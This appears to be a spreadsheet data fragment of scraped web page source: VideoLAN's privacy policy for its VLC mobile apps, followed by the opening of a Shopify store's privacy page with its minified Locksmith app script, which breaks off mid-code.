            &lt;li class="hidden-sm"&gt;
                &lt;form class="donate2" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"&gt;
    &lt;fieldset&gt;
        &lt;input name="cmd" value="_xclick" type="hidden"/&gt;
        &lt;input name="business" value="sponsor@videolan.org" type="hidden"/&gt;
        &lt;input name="item_name" value="Development and communication of VideoLAN" type="hidden"/&gt;
        &lt;input name="currency_code" value="EUR" type="hidden"/&gt;
        &lt;input name="tax" value="0" type="hidden"/&gt;
        &lt;input name="lc" value="GB" type="hidden"/&gt;
        &lt;input name="no_shipping" value="1" type="hidden"/&gt;
                &lt;input name="return" value="https://www.videolan.org/thank_you.html" type="hidden"/&gt;
        &lt;input class="euros" type='text' name="amount" value="4.00" /&gt;
        &lt;button type='submit'&gt;donate&lt;/button&gt;
    &lt;/fieldset&gt;
&lt;/form&gt;
            &lt;/li&gt;
            &lt;li class="hidden-sm"&gt;
                &lt;form class="donate2" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"&gt;
    &lt;fieldset&gt;
        &lt;input name="cmd" value="_xclick" type="hidden"/&gt;
        &lt;input name="business" value="sponsor@videolan.org" type="hidden"/&gt;
        &lt;input name="item_name" value="Development and communication of VideoLAN" type="hidden"/&gt;
        &lt;input name="currency_code" value="USD" type="hidden"/&gt;
        &lt;input name="tax" value="0" type="hidden"/&gt;
        &lt;input name="lc" value="US" type="hidden"/&gt;
        &lt;input name="no_shipping" value="1" type="hidden"/&gt;
                &lt;input name="return" value="https://www.videolan.org/thank_you.html" type="hidden"/&gt;
        &lt;input class="dollars" type='text' name="amount" value="5.00" /&gt;
        &lt;button type='submit'&gt;donate&lt;/button&gt;
    &lt;/fieldset&gt;
&lt;/form&gt;
            &lt;/li&gt;
            &lt;li class="dropdown visible-sm donate2"&gt;
                &lt;a href="//www.videolan.org/contribute.html#money" class="dropdown-toggle" data-toggle="dropdown" role="button" aria-haspopup="true" aria-expanded="false"&gt;
                    Donate &lt;span class="caret"&gt;&lt;/span&gt;
                &lt;/a&gt;
                 &lt;ul class="dropdown-menu donate-dropdown pull-right"&gt;
                    &lt;li&gt;
                        &lt;form class="donate2" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"&gt;
    &lt;fieldset&gt;
        &lt;input name="cmd" value="_xclick" type="hidden"/&gt;
        &lt;input name="business" value="sponsor@videolan.org" type="hidden"/&gt;
        &lt;input name="item_name" value="Development and communication of VideoLAN" type="hidden"/&gt;
        &lt;input name="currency_code" value="EUR" type="hidden"/&gt;
        &lt;input name="tax" value="0" type="hidden"/&gt;
        &lt;input name="lc" value="GB" type="hidden"/&gt;
        &lt;input name="no_shipping" value="1" type="hidden"/&gt;
                &lt;input name="return" value="https://www.videolan.org/thank_you.html" type="hidden"/&gt;
        &lt;input class="euros" type='text' name="amount" value="4.00" /&gt;
        &lt;button type='submit'&gt;donate&lt;/button&gt;
    &lt;/fieldset&gt;
&lt;/form&gt;
                    &lt;/li&gt;
                    &lt;li&gt;
                        &lt;form class="donate2" action="https://www.paypal.com/cgi-bin/webscr" method="post" target="_top"&gt;
    &lt;fieldset&gt;
        &lt;input name="cmd" value="_xclick" type="hidden"/&gt;
        &lt;input name="business" value="sponsor@videolan.org" type="hidden"/&gt;
        &lt;input name="item_name" value="Development and communication of VideoLAN" type="hidden"/&gt;
        &lt;input name="currency_code" value="USD" type="hidden"/&gt;
        &lt;input name="tax" value="0" type="hidden"/&gt;
        &lt;input name="lc" value="US" type="hidden"/&gt;
        &lt;input name="no_shipping" value="1" type="hidden"/&gt;
                &lt;input name="return" value="https://www.videolan.org/thank_you.html" type="hidden"/&gt;
        &lt;input class="dollars" type='text' name="amount" value="5.00" /&gt;
        &lt;button type='submit'&gt;donate&lt;/button&gt;
    &lt;/fieldset&gt;
&lt;/form&gt;
                    &lt;/li&gt;
                &lt;/ul&gt;
            &lt;/li&gt;
        &lt;/ul&gt;
                    &lt;/div&gt;
 &lt;/div&gt;
&lt;/nav&gt;
&lt;!-- header --&gt;
    &lt;div class="header container"&gt;
        &lt;div id="nonprofitOrganizationDiv2" class="center-block"&gt;
                VideoLAN, a project and a &lt;a href="//www.videolan.org/videolan/" class="noUnderline"&gt;non-profit organization.&lt;/a&gt;         &lt;/div&gt;
            &lt;/div&gt;
&lt;div&gt;
&lt;h1&gt;Privacy&lt;/h1&gt;
&lt;h2&gt; VLC Mobile&lt;/h2&gt;
&lt;p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This privacy policy covers the use of the 'VLC for Android', 'VLC for WinRT' and 'VLC for iOS' / 'VLC for tvOS' applications.&lt;br /&gt;
 It may not be applicable to other software produced or released by VideoLAN.
 &lt;/p&gt;
&lt;p&gt;
VideoLAN does not collect any statistics, personal information, or analytics from our users, other than built in mechanisms that are present for all the mobile or embedded applications in their respective main distribution channels.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;p&gt;
 The mobile or embedded versions of 'VLC' do allow for videos to be played via various network transports. Cookies are not stored at any point.</t>
  </si>
  <si>
    <t xml:space="preserve">Authentication credentials can be stored optionally on the user's local device upon the user's explicit request. On iOS and tvOS, authentication credentials can be shared across devices using proprietary encryption mechanisms provided by the host operating system, dubbed iCloud Keychain. VideoLAN does not have access to any information stored within.
</t>
  </si>
  <si>
    <t>&lt;/p&gt;
&lt;/div&gt;
    &lt;/div&gt; &lt;!-- BodyInner --&gt;
    &lt;div class="clearfix"&gt;&lt;/div&gt;
    &lt;div id='footer' class=""&gt;
        &lt;div class="container"&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-sm-12 col-md-3"&gt;
                    &lt;a href="//www.videolan.org/"&gt;
                        &lt;img src='//images.videolan.org/images/logoGrey.png' alt='Association VideoLAN' class='center-xs center-sm' /&gt;
                    &lt;/a&gt;
                    &lt;div class="social-box"&gt;
                        &lt;a class="social" href="https://www.facebook.com/vlc.media.player"&gt;
                            &lt;i class="icon-facebook"&gt;&lt;/i&gt;
                        &lt;/a&gt;
                        &lt;a class="social" href="https://www.twitter.com/videolan"&gt;
                            &lt;i class="icon-twitter"&gt;&lt;/i&gt;
                        &lt;/a&gt;
                     &lt;/div&gt;
                &lt;/div&gt;
                &lt;div class="col-xs-6 col-md-2"&gt;
                    &lt;div class='footerHeading'&gt;VLC media player&lt;/div&gt;
                    &lt;ul&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/"&gt;VLC&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/download- windows.html"&gt;VLC for Windows&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/download-macosx.html"&gt;VLC for Mac OS X&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/download-ubuntu.html"&gt;VLC for Ubuntu&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/download-android.html"&gt;VLC for Android&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/download-ios.html"&gt;VLC for iOS&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/skins.html"&gt;Skins&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href='https://addons.videolan.org/browse/cat/323/ord/latest/'&gt;Extensions&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/features.html"&gt;Features&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/screenshots.html"&gt;Screenshots&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/skineditor.html"&gt;VLC Skin Editor&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
                &lt;div class="col-xs-6 col-md-2"&gt;
                    &lt;div</t>
  </si>
  <si>
    <t>class='footerHeading'&gt;All Projects&lt;/div&gt;
                    &lt;ul&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlmc/"&gt;VideoLan Movie Creator&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/projects/dvblast.html"&gt;DVBlast&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/x264.html"&gt;x264&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/x262.html"&gt;x262&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/x265.html"&gt;x265&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/projects/multicat.html"&gt;multicat&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/projects/dav1d.html"&gt;dav1d&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/projects/vlma/"&gt;VLMa&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/vlc/libvlc.html"&gt;libVLC&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdcss.html"&gt;libdvdcss&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdnav.html"&gt;libdvdnav&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvdnav.html"&gt;libdvdread&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libbluray.html"&gt;libbluray&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvbpsi.html"&gt;libdvbpsi&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libaacs.html"&gt;libaacs&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/libdvbcsa.html"&gt;libdvbcsa&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/bitstream.html"&gt;biTStream&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/developers/unity.html"&gt;vlc-unity&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
                &lt;div class="col-xs-6 col-md-2"&gt;
                    &lt;div class='footerHeading'&gt;Community&lt;/div&gt;
                    &lt;ul&gt;
                        &lt;li&gt;&lt;a href='https://wiki.videolan.org/'&gt;Wiki&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a</t>
  </si>
  <si>
    <t>href='https://forum.videolan.org/'&gt;Forums&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/support/lists.php"&gt;Mailing-Lists&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/support/faq.html"&gt;FAQ&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/contribute.html#money"&gt;Donate money&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/contribute.html"&gt;Donate time&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/goodies.html"&gt;Get Goodies&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
                &lt;div class="col-xs-6 col-md-2"&gt;
                    &lt;div class='footerHeading'&gt;VideoLAN&lt;/div&gt;
                    &lt;ul&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/videolan/"&gt;Project and Organization&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/videolan/team/"&gt;Team&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/legal.html"&gt;Legal&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/contact.html"&gt;Contact us&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/videolan/partners.html"&gt;Partners&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/videolan/mirrors.html"&gt;Mirrors&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/press/"&gt;Press center&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/videolan/events/"&gt;Events&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/security/"&gt;Security center&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/contribute.html"&gt;Get Involved&lt;/a&gt;&lt;/li&gt;
                        &lt;li&gt;&lt;a href="//www.videolan.org/news.html"&gt;News&lt;/a&gt;&lt;/li&gt;
                    &lt;/ul&gt;
                &lt;/div&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div id='translation' class="col-md-12" style="font-size: 9px;"&gt;
                                &lt;/div&gt;
            &lt;/div&gt;
            &lt;div class="row"&gt;
                &lt;div class="col-md-12" style='text-align: center; line-height: 14px; font-size: 9px; color: #999;'&gt;
                    &lt;p&gt;
                        &lt;a href='/legal.html'&gt;Legal&lt;/a&gt;
                        &lt;span dir="ltr" lang="en"&gt;
                            | &lt;a href='/contact.html'&gt;Report Trademark Abuse&lt;/a&gt;&lt;br /&gt;
                            VideoLAN, VLC, VLC media player and x264 are trademarks internationally registered by the &lt;a href="/videolan/"&gt;VideoLAN non-profit organization.&lt;/a&gt;&lt;br /&gt;
                            VideoLAN software is licensed under various open-source licenses: use and distribution are defined by each software license.
                         &lt;/span&gt;
                    &lt;/p&gt;
                    &lt;p&gt;
                        &lt;span dir="ltr" lang="en"&gt;
                            Design by &lt;a href="https://www.madebyargon.com"&gt;Made By Argon&lt;/a&gt;. Some icons are licensed under the &lt;a href="https://creativecommons.org/licenses/by-sa/3.0/us/"&gt;CC BY-SA 3.0+&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;br /&gt;
                             The VLC cone icon was designed by Richard Øiestad. Icons for VLMC, DVBlast and x264 designed by &lt;a href='http://cuberto.com/'&gt;Roman Khramov&lt;/a&gt;.
                        </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;/span&gt;
                    &lt;/p&gt;
                 &lt;/div&gt;
            &lt;/div&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;/body&gt;
&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;!DOCTYPE html&gt;
&lt;html class="no-js no-touch" lang="en"&gt; &lt;head&gt; &lt;script type="application/vnd.locksmith+json" data-locksmith&gt;{"version":"v6.29","locked":false,"initialized":true,"scope":"page","access_granted":true,"access_denied":false,"requires_customer":false,"manual_lock":false,"server_lock":false,"server_rendered":null,"hide_resource":false,"hide_links_to_resource":false,"transparent":true,"locks":{"all":[],"opened":[]},"keys":[],"keys_signature":"a8bef49344089342b691c118bf3a55fbb21ae6796baebfb09eb45351cddc209b","state":{"template":"page","theme":131681288342,"product":null,"collection":null,"page":"privacy","blog":null,"article":null,"app":null},"now":1681304807,"path":"\/pages\/privacy","locale_root_url":"\/","canonical_url":"https:\/\/www.vooks.com\/pages\/privacy","customer_id":null,"customer_id_signature":"a8bef49344089342b691c118bf3a55fbb21ae6796baebfb09eb45351cddc209b","cart":null}&lt;/script&gt;&lt;script data-locksmith&gt;!function(){var require=void 0,reqwest=function(){function succeed(e){var t=protocolRe.exec(e.url);return t=t&amp;&amp;t[1]||context.location.protocol,httpsRe.test(t)?twoHundo.test(e.request.status):!!e.request.response}function handleReadyState(e,t,n){return function(){return e._aborted?n(e.request):e._timedOut?n(e.request,"Request is aborted: timeout"):void(e.request&amp;&amp;4==e.request[readyState]&amp;&amp;(e.request.onreadystatechange=noop,succeed(e)?t(e.request):n(e.request)))}}function setHeaders(e,t){var n,s=t.headers||{};s. Accept=s.Accept||defaultHeaders.accept[t.type]||defaultHeaders.accept["*"];var r="undefined"!=typeof FormData&amp;&amp;t.data instanceof FormData;!t.crossOrigin&amp;&amp;!s[requestedWith]&amp;&amp;(s[requestedWith]=defaultHeaders.requestedWith),!s[contentType]&amp;&amp;!r&amp;&amp;(s[contentType]=t.contentType||defaultHeaders.contentType);for(n in s)s.hasOwnProperty(n)&amp;&amp;"setRequestHeader"in e&amp;&amp;e.setRequestHeader(n,s[n])}function setCredentials(e,t){"undefined"!=typeof t.withCredentials&amp;&amp;"undefined"!=typeof e.withCredentials&amp;&amp;(e.withCredentials=!!t.withCredentials)}function generalCallback(e){lastValue=e}function urlappend(e,t){return e+(/[?]/.test(e)?"&amp;":"?")+t}function handleJsonp(e,t,n,s){var r=uniqid++,a=e.jsonpCallback||"callback",o=e.jsonpCallbackName||reqwest.getcallbackPrefix(r),i=new RegExp("((^|[?]|&amp;)"+a+")=([^&amp;]+)"),l=s.match(i),c=doc.createElement("script"),u=0,d=-1!==navigator.userAgent.indexOf("MSIE 10.0");return l?"?"===l[3]?s=s.replace(i,"$1="+o):o=l[3]:s=urlappend(s,a+"="+o),context[o]=generalCallback,c.type="text/javascript",c.src=s,c.async=!0,"undefined"!=typeof c.onreadystatechange&amp;&amp;!d&amp;&amp;(c.htmlFor=c.id="_reqwest_"+r),c.onload=c.onreadystatechange=function(){return c[readyState]&amp;&amp;"complete"!==c[readyState]&amp;&amp;"loaded"!==c[readyState]||u?!1:(c.onload=c.onreadystatechange=null,c.onclick&amp;&amp;c.onclick(),t(lastValue),lastValue=void 0,head.removeChild(c),u=1,void 0)},head.appendChild(c),{abort:function(){c.onload=c.onreadystatechange=null,n({},"Request is aborted: timeout",{}),lastValue=void 0,head.removeChild(c),u=1}}}function getRequest(e,t){var n,s=this.o,r=(s.method||"GET").toUpperCase(),a="string"==typeof s?s:s.url,o=s.processData!==!1&amp;&amp;s.data&amp;&amp;"string"!=typeof s.data?reqwest.toQueryString(s.data):s.data||null,i=!1;return("jsonp"==s.type||"GET"==r)&amp;&amp;o&amp;&amp;(a=urlappend(a,o),o=null),"jsonp"==s.type?handleJsonp(s,e,t,a):(n=s.xhr&amp;&amp;s.xhr(s)||xhr(s),n.open(r,a,s.async===!1?!1:!0),setHeaders(n,s),setCredentials(n,s),context[xDomainRequest]&amp;&amp;n instanceof context[xDomainRequest]?(n.onload=e,n.onerror=t,n.onprogress=function(){},i=!0):n.onreadystatechange=handleReadyState(this,e,t),s.before&amp;&amp;s.before(n),i?setTimeout(function(){n.send(o)},200):n.send(o),n)}function Reqwest(e,t){this.o=e,this.fn=t,init.apply(this,arguments)}function setType(e){return null===e?void 0:e.match("json")?"json":e.match("javascript")?"js":e.match("text")?"html":e.match("xml")?"xml":void 0}function init(o,fn){function complete(e){for(o.timeout&amp;&amp;clearTimeout(self.timeout),self.timeout=null;self._completeHandlers.length&gt;0;)self._completeHandlers.shift()(e)}function success(resp){var type=o.type||resp&amp;&amp;setType(resp.getResponseHeader("Content-Type"));resp="jsonp"!==type?self.request:resp;var filteredResponse=globalSetupOptions.dataFilter(resp.responseText,type),r=filteredResponse;try{resp.responseText=r}catch(e){}if(r)switch(type){case"json":try{resp=context. JSON?context.JSON.parse(r):eval("("+r+")")}catch(err){return error(resp,"Could not parse JSON in response",err)}break;case"js":resp=eval(r);break;case"html":resp=r;break;case"xml":resp=resp.responseXML&amp;&amp;resp.responseXML.parseError&amp;&amp;resp.responseXML.parseError.errorCode&amp;&amp;resp.responseXML.parseError.reason?null:resp.responseXML}for(self._responseArgs.resp=resp,self._fulfilled=!0,fn(resp),self._successHandler(resp);self._fulfillmentHandlers.length&gt;0;)resp=self._fulfillmentHandlers.shift()(resp);complete(resp)}function timedOut(){self._timedOut=!0,self.request.abort()}function error(e,t,n){for(e=self.request,self._responseArgs.resp=e,self._responseArgs.msg=t,self._responseArgs.t=n,self._erred=!0;self._errorHandlers.length&gt;0;)self._errorHandlers.shift()(e,t,n);complete(e)}this.url="string"==typeof o?o:o.url,this.timeout=null,this._fulfilled=!1,this._successHandler=function(){},this._fulfillmentHandlers=[],this._errorHandlers=[],this._completeHandlers=[],this._erred=!1,this._responseArgs={};var self=this;fn=fn||function(){},o.timeout&amp;&amp;(this.timeout=setTimeout(function(){timedOut()},o.timeout)),o.success&amp;&amp;(this._successHandler=function(){o.success.apply(o,arguments)}),o.error&amp;&amp;this._errorHandlers.push(function(){o.error.apply(o,arguments)}),o.complete&amp;&amp;this._completeHandlers.push(function(){o.complete.apply(o,arguments)}),this.request=getRequest.call(this,success,error)}function reqwest(e,t){return new Reqwest(e,t)}function normalize(e){return e?e.replace(/\r?\n/g,"\r\n"):""}function serial(e,t){var n,s,r,a,o=e.name,i=e.tagName.toLowerCase(),l=function(e){e&amp;&amp;!e.disabled&amp;&amp;t(o,normalize(e.attributes.value&amp;&amp;e.attributes.value.specified?e.value:e.text))};if(!e.disabled&amp;&amp;o)switch(i){case"input":/reset|button|image|file/i.test(e.type)||(n=/checkbox/i.test(e.type),s=/radio/i.test(e.type),r=e.value,(!n&amp;&amp;!s||e.checked)&amp;&amp;t(o,normalize(n&amp;&amp;""===r?"on":r)));break;case"textarea":t(o,normalize(e.value));break;case"select":if("select-one"===e.type.toLowerCase())l(e.selectedIndex&gt;=0?e.options[e.selectedIndex]:null);else for(a=0;e.length&amp;&amp;a&lt;e.length;a++)e.options[a].selected&amp;&amp;l(e.options[a])}}function eachFormElement(){var e,t,n=this,s=function(e,t){var s,r,a;for(s=0;s&lt;t.length;s++)for(a=e[byTag](t[s]),r=0;r&lt;a.length;r++)serial(a[r],n)};for(t=0;t&lt;arguments.length;t++)e=arguments[t],/input|select|textarea/i.test(e.tagName)&amp;&amp;serial(e,n),s(e,["input","select","textarea"])}function serializeQueryString(){return reqwest.toQueryString(reqwest.serializeArray.apply(null,arguments))}function serializeHash(){var e={};return eachFormElement.apply(function(t,n){t in e?(e[t]&amp;&amp;!isArray(e[t])&amp;&amp;(e[t]=[e[t]]),e[t].push(n)):e[t]=n},arguments),e}function buildParams(e,t,n,s){var r,a,o,i=/\[\]$/;if(isArray(t))for(a=0;t&amp;&amp;a&lt;t.length;a++)o=t[a],n||i.test(e)?s(e,o):buildParams(e+"["+("object"==typeof o?a:"")+"]",o,n,s);else if(t&amp;&amp;"[object Object]"===t.toString())for(r in t)buildParams(e+"["+r+"]",t[r],n,s);else s(e,t)}var context=this;if("window"in context)var doc=document,byTag="getElementsByTagName",head=doc[byTag]("head")[0];else{var XHR2;try{XHR2=require("xhr2")}catch(ex){throw new Error("Peer dependency `xhr2` required!</t>
  </si>
  <si>
    <t>Please npm install xhr2")}}var httpsRe=/^http/,protocolRe=/(^\w+):\/\//,twoHundo=/^(20\d|1223)$/,readyState="readyState",contentType="Content-Type",requestedWith="X-Requested-With",uniqid=0,callbackPrefix="reqwest_"+ +new Date,lastValue,xmlHttpRequest="XMLHttpRequest",xDomainRequest="XDomainRequest",noop=function(){},isArray="function"==typeof Array.isArray?Array.isArray:function(e){return e instanceof Array},defaultHeaders={contentType:"application/x-www-form-urlencoded",requestedWith:xmlHttpRequest,accept:{"*":"text/javascript, text/html, application/xml, text/xml, */*",xml:"application/xml, text/xml",html:"text/html",text:"text/plain",json:"application/json, text/javascript",js:"application/javascript, text/javascript"}},xhr=function(e){if(e.crossOrigin===!0){var t=context[xmlHttpRequest]?new XMLHttpRequest:null;if(t&amp;&amp;"withCredentials"in t)return t;if(context[xDomainRequest])return new XDomainRequest;throw new Error("Browser does not support cross-origin requests")}return context[xmlHttpRequest]?new XMLHttpRequest:XHR2?new XHR2:new ActiveXObject("Microsoft. XMLHTTP")},globalSetupOptions={dataFilter:</t>
  </si>
  <si>
    <t>function(e){return e}};return Reqwest.prototype={abort:function(){this._aborted=!0,this.request.abort()},retry:function(){init.call(this,this.o,this.fn)},then:function(e,t){return e=e||function(){},t=t||function(){},this._fulfilled?this._responseArgs.resp=e(this._responseArgs.resp):this._erred?t(this._responseArgs.resp,this._responseArgs.msg,this._responseArgs.t):(this._fulfillmentHandlers.push(e),this._errorHandlers.push(t)),this},always:function(e){return this._fulfilled||this._erred?e(this._responseArgs.resp):this._completeHandlers.push(e),this},fail:function(e){return this._erred?e(this._responseArgs.resp,this._responseArgs.msg,this._responseArgs.t):this._errorHandlers.push(e),this},"catch":function(e){return this.fail(e)}},reqwest.serializeArray=function(){var e=[];return eachFormElement.apply(function(t,n){e.push({name:t,value:n})},arguments),e},reqwest.serialize=function(){if(0===arguments.length)return"";var e,t,n=Array.prototype.slice.call(arguments,0);return e=n.pop(),e&amp;&amp;e.nodeType&amp;&amp;n.push(e)&amp;&amp;(e=null),e&amp;&amp;(e=e.type),t="map"==e?serializeHash:"array"==e?reqwest.serializeArray:serializeQueryString,t.apply(null,n)},reqwest.toQueryString=function(e,t){var n,s,r=t||!1,a=[],o=encodeURIComponent,i=function(e,t){t="function"==typeof t?t():null==t?"":t,a[a.length]=o(e)+"="+o(t)};if(isArray(e))for(s=0;e&amp;&amp;s&lt;e.length;s++)i(e[s].name,e[s].value);else for(n in e)e.hasOwnProperty(n)&amp;&amp;buildParams(n,e[n],r,i);return a.join("&amp;").replace(/%20/g,"+")},reqwest.getcallbackPrefix=function(){return callbackPrefix},reqwest.compat=function(e,t){return e&amp;&amp;(e.type&amp;&amp;(e.method=e.type)&amp;&amp;delete e.type,e.dataType&amp;&amp;(e.type=e.dataType),e.jsonpCallback&amp;&amp;(e.jsonpCallbackName=e.jsonpCallback)&amp;&amp;delete e.jsonpCallback,e.jsonp&amp;&amp;(e.jsonpCallback=e.jsonp)),new Reqwest(e,t)},reqwest.ajaxSetup=function(e){e=e||{};for(var t in e)globalSetupOptions[t]=e[t]},reqwest}();!function(){var e=window. Locksmith={},t=document.querySelector('script[type="application/vnd.locksmith+json"]'),n=t&amp;&amp;t.innerHTML;if(e.state={},e.util={},e.loading=!1,n)try{e.state=JSON.parse(n)}catch(s){}if(document.addEventListener&amp;&amp;document.querySelector){var r,a,o,i=[76,79,67,75,83,77,73,84,72,49,49],l=function(){a=i.slice(0)},c="style",u=function(e){e&amp;&amp;27!==e.keyCode&amp;&amp;"click"!==e.type||(document.removeEventListener("keydown",u),document.removeEventListener("click",u),r&amp;&amp;document.body.removeChild(r),r=null)};l(),document.addEventListener("keyup",function(e){if(e.keyCode===a[0]){if(clearTimeout(o),a.shift(),a.length&gt;0)return void(o=setTimeout(l,1e3));l(),u(),r=document.createElement("div"),r[c].width="50%",r[c].maxWidth="1000px",r[c].height="85%",r[c].border="1px rgba(0, 0, 0, 0.2) solid",r[c].background="rgba(255, 255, 255, 0.99)",r[c].borderRadius="4px",r[c].position="fixed",r[c].top="50%",r[c].left="50%",r[c].transform="translateY(-50%) translateX(-50%)",r[c].boxShadow="0 2px 5px rgba(0, 0, 0, 0.3), 0 0</t>
  </si>
  <si>
    <t>100vh 100vw rgba(0, 0, 0, 0.5)",r[c].zIndex="2147483645";var t=document.createElement("textarea");t.value=JSON.stringify(JSON.parse(n),null,2),t[c].border="none",t[c].display="block",t[c].boxSizing="border-box",t[c].width="100%",t[c].height="100%",t[c].background="transparent",t[c].padding="22px",t[c].fontFamily="monospace",t[c].fontSize="14px",t[c].color="#333",t[c].resize="none",t[c].outline="none",t.readOnly=!0,r.appendChild(t),document.body.appendChild(r),t.addEventListener("click",function(e){e.stopImmediatePropagation()}),t.select(),document.addEventListener("keydown",u),document.addEventListener("click",u)}})}e.isEmbedded=-1!==window.location.search.indexOf("_ab=0&amp;_fd=0&amp;_sc=1"),e.path=e.state.path||window.location.pathname,e.basePath=e.state.locale_root_url.concat("/apps/locksmith").replace(/^\/\//,"/"),e.reloading=!1,e.util.console=window.console||{log:function(){},error:function(){}},e.util.makeUrl=function(t,n){var s,r=e.basePath+t,a=[],o=e.cache();for(s in o)a.push(s+"="+encodeURIComponent(o[s]));for(s in n)a.push(s+"="+encodeURIComponent(n[s]));return e.state.customer_id&amp;&amp;(a.push("customer_id="+encodeURIComponent(e.state.customer_id)),a.push("customer_id_signature="+encodeURIComponent(e.state.customer_id_signature))),r+=(-1===r.indexOf("?")?"?":"&amp;")+a.join("&amp;")},e._initializeCallbacks=[],e.on=function(t,n){if("initialize"!==t)throw'Locksmith.on() currently only supports the "initialize" event';e._initializeCallbacks.push(n)},e.initializeSession=function(t){if(!e.isEmbedded){t=t||{};var n=!1,s=!0,r=!0;t.silent&amp;&amp;(n=!0,s=!1,r=!1),e.ping({silent:n,spinner:s,reload:r,callback:function(){e._initializeCallbacks.forEach(function(e){e()})}})}},e.cache=function(e){var t={};try{var n=function(e){return(document.cookie.match("(^|; )"+e+"=([^;]*)")||0)[2]};t=JSON.parse(decodeURIComponent(n("locksmith-params")||"{}"))}catch(s){}if(e){for(var r in e)t[r]=e[r];document.cookie="locksmith-params=; expires=Thu, 01 Jan 1970 00:00:00 GMT; path=/",document.cookie="locksmith-params="+encodeURIComponent(JSON.stringify(t))+"; path=/"}return t},e.cache.cart=e.state.cart,e.cache.cartLastSaved=null,e.params=e.cache(),e.util.reload=function(){e.reloading=!0;try{window.location.href=window.location.href.replace(/#.*/,"")}catch(t){e.util.console.error("Preferred reload method failed",t),window.location.reload()}},e.cache.saveCart=function(t){if(!e.cache.cart||e.cache.cart===e.cache.cartLastSaved)return t?t():null;var 